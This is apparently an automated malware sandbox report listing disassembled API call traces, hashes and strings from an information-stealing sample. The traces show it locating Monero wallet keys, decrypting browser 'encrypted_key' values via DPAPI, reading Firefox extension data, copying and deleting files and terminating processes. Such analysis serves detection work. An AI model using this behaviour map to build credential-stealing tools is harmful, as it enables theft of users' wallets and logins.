                          • API String ID: 211194620-0
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                            • Part of subcall function 00928B60: GetSystemTime.KERNEL32(00930E1A,0104B3D0,009305AE,?,?,009113F9,?,0000001A,00930E1A,00000000,?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 00928B86
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0091D481
                          • lstrlen.KERNEL32(00000000), ref: 0091D698
                          • lstrlen.KERNEL32(00000000), ref: 0091D6AC
                          • DeleteFileA.KERNEL32(00000000), ref: 0091D72B
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 85c9f6af8e86ddcbe4ec4f8a0ab489a3a7a324f7a0e1a7ea9fbcdd3323c86e2d
                          • Instruction ID: 64c74c4ce344a2ba120b1f0cf93825431ae6f55a4eed94715c47af68851866d5
                          • Opcode Fuzzy Hash: 85c9f6af8e86ddcbe4ec4f8a0ab489a3a7a324f7a0e1a7ea9fbcdd3323c86e2d
                          • Instruction Fuzzy Hash: CC91F0739101289BDB04FBA4EC96FEE7339AF94300F504568F506B60A5EF346A49CB66
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                            • Part of subcall function 00928B60: GetSystemTime.KERNEL32(00930E1A,0104B3D0,009305AE,?,?,009113F9,?,0000001A,00930E1A,00000000,?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 00928B86
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0091D801
                          • lstrlen.KERNEL32(00000000), ref: 0091D99F
                          • lstrlen.KERNEL32(00000000), ref: 0091D9B3
                          • DeleteFileA.KERNEL32(00000000), ref: 0091DA32
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                          • String ID:
                          • API String ID: 211194620-0
                          • Opcode ID: 9bca03dfde8887ca18939204656e57ea8e8bcd1676e48d76d3110c30a303e417
                          • Instruction ID: 7cffe09bd5ea758156cf71a66b5ca3eba82c9ceefdf3165ead9436c422673ca2
                          • Opcode Fuzzy Hash: 9bca03dfde8887ca18939204656e57ea8e8bcd1676e48d76d3110c30a303e417
                          • Instruction Fuzzy Hash: 0981EF739101289BDB04FBA4EC96FEE7339AF94300F504558F506B70A5EF346A49CBA6
                          APIs
                            • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                            • Part of subcall function 009199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009199EC
                            • Part of subcall function 009199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919A11
                            • Part of subcall function 009199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00919A31
                            • Part of subcall function 009199C0: ReadFile.KERNEL32(000000FF,?,00000000,0091148F,00000000), ref: 00919A5A
                            • Part of subcall function 009199C0: LocalFree.KERNEL32(0091148F), ref: 00919A90
                            • Part of subcall function 009199C0: CloseHandle.KERNEL32(000000FF), ref: 00919A9A
                            • Part of subcall function 00928E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00928E52
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,01049D28,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                            • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                            • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                            • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                            • Part of subcall function 0092A920: lstrcpy.KERNEL32(00000000,?), ref: 0092A972
                            • Part of subcall function 0092A920: lstrcat.KERNEL32(00000000), ref: 0092A982
                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00931580,00930D92), ref: 0091F54C
                          • lstrlen.KERNEL32(00000000), ref: 0091F56B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                          • String ID: ^userContextId=4294967295$moz-extension+++
                          • API String ID: 998311485-3310892237
                          • Opcode ID: b8717481a6bf366fd759f846cf4dcbd1c65207187d575e6c326c03bcc3143597
                          • Instruction ID: b7a11d6cfd178944c087e94c74861b88f91878b02c198e55c3067d04927cbfd6
                          • Opcode Fuzzy Hash: b8717481a6bf366fd759f846cf4dcbd1c65207187d575e6c326c03bcc3143597
                          • Instruction Fuzzy Hash: 48510276D10118ABDB04FBA4EC96EED737DAFD4300F408528F41667196EE346A09CBA6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: e2f1d0cc8d5756e8d6b4feae45866400363aff09c1da5d3b5eaa095f8d083119
                          • Instruction ID: 4b1e909bb4a4f4cca967de7f57ca45339c96e7c5dc9c7f774954edde3ba76391
                          • Opcode Fuzzy Hash: e2f1d0cc8d5756e8d6b4feae45866400363aff09c1da5d3b5eaa095f8d083119
                          • Instruction Fuzzy Hash: 6E414571D10119AFCB04EFA4E856BFEB778AF84304F008418F41677255DB79AA09CF96
                          APIs
                            • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                            • Part of subcall function 009199C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009199EC
                            • Part of subcall function 009199C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00919A11
                            • Part of subcall function 009199C0: LocalAlloc.KERNEL32(00000040,?), ref: 00919A31
                            • Part of subcall function 009199C0: ReadFile.KERNEL32(000000FF,?,00000000,0091148F,00000000), ref: 00919A5A
                            • Part of subcall function 009199C0: LocalFree.KERNEL32(0091148F), ref: 00919A90
                            • Part of subcall function 009199C0: CloseHandle.KERNEL32(000000FF), ref: 00919A9A
                            • Part of subcall function 00928E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00928E52
                          • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00919D39
                            • Part of subcall function 00919AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00914EEE,00000000,00000000), ref: 00919AEF
                            • Part of subcall function 00919AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00914EEE,00000000,?), ref: 00919B01
                            • Part of subcall function 00919AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00914EEE,00000000,00000000), ref: 00919B2A
                            • Part of subcall function 00919AC0: LocalFree.KERNEL32(?,?,?,?,00914EEE,00000000,?), ref: 00919B3F
                            • Part of subcall function 00919B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00919B84
                            • Part of subcall function 00919B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00919BA3
                            • Part of subcall function 00919B60: LocalFree.KERNEL32(?), ref: 00919BD3
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                          • String ID: $"encrypted_key":"$DPAPI
                          • API String ID: 2100535398-738592651
                          • Opcode ID: 50d3a8c13769607d4daaf6ffec21175f000e4652a5a1280e7eb9dabae9decc72
                          • Instruction ID: 0ed9e4f217e78fcc01e08c80395e90a18b51e0be14fe0dae4055085bd0bd5a5f
                          • Opcode Fuzzy Hash: 50d3a8c13769607d4daaf6ffec21175f000e4652a5a1280e7eb9dabae9decc72
                          • Instruction Fuzzy Hash: A63112B6E1010DABCB04DFE4DD95BEFB7B8AF88304F144519F915A7285EB309A44CBA1
                          APIs
                          • memset.MSVCRT ref: 009294EB
                            • Part of subcall function 00928D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0092951E,00000000), ref: 00928D5B
                            • Part of subcall function 00928D50: RtlAllocateHeap.NTDLL(00000000), ref: 00928D62
                            • Part of subcall function 00928D50: wsprintfW.USER32 ref: 00928D78
                          • OpenProcess.KERNEL32(00001001,00000000,?), ref: 009295AB
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 009295C9
                          • CloseHandle.KERNEL32(00000000), ref: 009295D6
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                          • String ID:
                          • API String ID: 3729781310-0
                          • Opcode ID: 53979a31ddea08e0fd73d351e7257f78a5a28560ea868b520cf8f85a0167e645
                          • Instruction ID: 103479cdd2d0f1b974682163c2c4774afa2172d98c89510ffa9cec62f5344ad7
                          • Opcode Fuzzy Hash: 53979a31ddea08e0fd73d351e7257f78a5a28560ea868b520cf8f85a0167e645
                          • Instruction Fuzzy Hash: 2C312A71A003189FDB14DBD0DD49BEDB778EB48301F104559F506AB188DB74AA89CB51
                          APIs
                          • CreateFileA.KERNEL32(00923AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00923AEE,?), ref: 009292FC
                          • GetFileSizeEx.KERNEL32(000000FF,00923AEE), ref: 00929319
                          • CloseHandle.KERNEL32(000000FF), ref: 00929327
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$CloseCreateHandleSize
                          • String ID:
                          • API String ID: 1378416451-0
                          • Opcode ID: a7767e22fc7968f58a283133d432a6e7acf0cd31e54cda01b35080f3d1f6827b
                          • Instruction ID: a5fcdf055f9a6325d074450794e9116230467aa246f1962276b417f33552e284
                          • Opcode Fuzzy Hash: a7767e22fc7968f58a283133d432a6e7acf0cd31e54cda01b35080f3d1f6827b
                          • Instruction Fuzzy Hash: C5F04F35E40308BBDF10DFB0EC59F9E77B9AB4C711F10C694B651A72C4DA749A018B40
                          APIs
                          • __getptd.LIBCMT ref: 0092C74E
                            • Part of subcall function 0092BF9F: __amsg_exit.LIBCMT ref: 0092BFAF
                          • __getptd.LIBCMT ref: 0092C765
                          • __amsg_exit.LIBCMT ref: 0092C773
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 0092C797
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 00b05925b9d52716c29ce3c0847594a29d99f302234c00bc3782fa61bc13627c
                          • Instruction ID: 2b0960ba740b7bb46acd8b438f084508203093b3282552c26cb6b4703663d6ac
                          • Opcode Fuzzy Hash: 00b05925b9d52716c29ce3c0847594a29d99f302234c00bc3782fa61bc13627c
                          • Instruction Fuzzy Hash: 60F0BEB39047309BD721BBB8BC07B9E33E46F80720F214249F505F62DBCB685940AE96
                          APIs
                            • Part of subcall function 00928DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00928E0B
                          • lstrcat.KERNEL32(?,00000000), ref: 00924F7A
                          • lstrcat.KERNEL32(?,00931070), ref: 00924F97
                          • lstrcat.KERNEL32(?,01049DF8), ref: 00924FAB
                          • lstrcat.KERNEL32(?,00931074), ref: 00924FBD
                            • Part of subcall function 00924910: wsprintfA.USER32 ref: 0092492C
                            • Part of subcall function 00924910: FindFirstFileA.KERNEL32(?,?), ref: 00924943
                            • Part of subcall function 00924910: StrCmpCA.SHLWAPI(?,00930FDC), ref: 00924971
                            • Part of subcall function 00924910: StrCmpCA.SHLWAPI(?,00930FE0), ref: 00924987
                            • Part of subcall function 00924910: FindNextFileA.KERNEL32(000000FF,?), ref: 00924B7D
                            • Part of subcall function 00924910: FindClose.KERNEL32(000000FF), ref: 00924B92
                          Memory Dump Source
                          • Source File: 00000000.00000002.1746217241.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_910000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                          • String ID:
                          • API String ID: 2667927680-0
                          • Opcode ID: 29ad4c81a56ffd6ef219d1e532731851d80b65dbcc691b4746b4547e8dffc191
                          • Instruction ID: 47bc4c929d7c70b7fea9276d87625971ea1f8dded042f19f2dce2d863aae4f97
                          • Opcode Fuzzy Hash: 29ad4c81a56ffd6ef219d1e532731851d80b65dbcc691b4746b4547e8dffc191
                          • Instruction Fuzzy Hash: 2A21887A90031867C754F760FC46FEE333DABD4701F004694B659A3185EE75A6C88F92